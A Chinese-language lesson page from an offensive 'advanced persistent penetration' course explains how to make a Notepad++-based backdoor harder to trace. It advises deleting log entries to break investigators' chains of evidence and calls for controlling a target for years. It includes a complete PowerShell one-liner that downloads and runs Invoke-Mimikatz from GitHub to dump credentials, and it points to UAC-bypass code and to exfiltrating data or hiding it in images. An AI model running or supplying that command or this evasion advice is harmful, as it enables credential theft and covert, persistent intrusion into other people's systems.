- 1-10課
- 11-20課
- 31-40課
- 41-50課
- 51-60課
- 61-70課
- 71-80課
第五十九課:高級(jí)持續(xù)滲透-第三季關(guān)于后門補(bǔ)充二
專注APT攻擊與防御
https://micropoor.blogspot.com/
前者的話:從第三季開始引入段子,讓本枯燥的學(xué)術(shù)文章,也變得生動(dòng)有趣。
第二季的Demo遵循人性五條來設(shè)計(jì),回憶這其中五條:
1:攻擊方與防御方的本質(zhì)是什么?
增加對(duì)方的時(shí)間成本,人力成本,資源成本(不限制于服務(wù)器資源),金錢成本。
2:安全公司的本質(zhì)是什么?
盈利,最小投入,最大產(chǎn)出。
3:安全公司產(chǎn)品的本質(zhì)是什么?
能適應(yīng)大部分客戶,適應(yīng)市場(chǎng)化,并且適應(yīng)大部分機(jī)器。(包括不限制于資源緊張,寬帶不足等問題的客戶)
4:安全人員的本質(zhì)是什么?
賺錢,養(yǎng)家。買房,還房貸。導(dǎo)致,快速解決客戶問題(無論暫時(shí)還是永久性解決),以免投訴。
5:對(duì)接客戶的本質(zhì)是什么?
對(duì)接客戶也是某公司內(nèi)安全工作的一員,與概念4相同。
6:線索排查與反線索排查
那么這個(gè)demo離可高級(jí)可持續(xù)性滲透后門還有一段距離,這里引入第六條“線索排查”與“反線索排查”,在第二季的demo中,它生成了一個(gè)名為micropoor.txt的文件,如果經(jīng)驗(yàn)豐富的安全人員可根據(jù)時(shí)間差來排查日記,demo的工作流程大致是這樣的,打開notepad++,生成micropoor.txt,寫入內(nèi)容,關(guān)閉文件流。根據(jù)線索排查,定位到notepad++,導(dǎo)致權(quán)限失控。
在線索排查概念中,這里要引入“ABC”類線索關(guān)聯(lián)排查,當(dāng)防御者在得到線索A,順藤到B,最后排查到目標(biāo)文件C,根據(jù)五條中的第一條,demo要考慮如何刪除指定日志內(nèi)容,以及其他操作。來阻止ABC類線索關(guān)聯(lián)排查。不要思維固死在這是一個(gè)nontepad++后門的文章,它是一個(gè)面向類后門,面向的是可掌握源碼編譯的類后門。同樣不要把思維固定死在demo中的例子,針對(duì)不同版本的NT系統(tǒng),完全引用“powershell IEX (New-Object
System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-
Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而關(guān)于bypass UAC,已經(jīng)有成熟的源碼?;虬l(fā)送至遠(yuǎn)程或是寫在
本地的圖片里,不要讓知識(shí),限制了后門的想象。這也正是第一季所說的:一個(gè)優(yōu)秀的Microdoor是量身目標(biāo)制定且一般不具備通用性的。是的,一般不具備通用性。
觀看目前文章的一共有2類人,一類攻擊方,一類防守方。假設(shè)一個(gè)場(chǎng)景,現(xiàn)在擺在你面前有一臺(tái)筆記本,并且這臺(tái)筆記本有明確的后門,你的任務(wù),排查后門。我想所有人都會(huì)排查注冊(cè)表,服務(wù),端口,進(jìn)程等。因?yàn)檫@些具備通用性,也同樣具備通用性排查手段。臨近文章結(jié)尾,第三次引用:在后門的進(jìn)化對(duì)抗中,rootkit也發(fā)生了變化,最大的改變是它的系統(tǒng)層次結(jié)構(gòu)發(fā)生了變化。如果徹底理解了這段話。那么就要引用王健X爸爸的一句話:先定個(gè)小目標(biāo),控它個(gè)1825天。
/*
段子
*/
奈何廠商不重視后滲透攻擊與持久性攻擊,文章的結(jié)尾引用馬X爸爸的一句話:
廠商不改變,我們就改變廠商。
Micropoor
?
問答
其他問答
暫無記錄
筆記
{{ item.create_date_fmt }}
{{item.is_public == 1 ?"已公開":"未公開"}}
筆記審核中
收起
刪除
編輯
{{ item.likes }}
{{ item.likes }}
采集
已采集
資料下載
暫無記錄
作業(yè)
暫無記錄
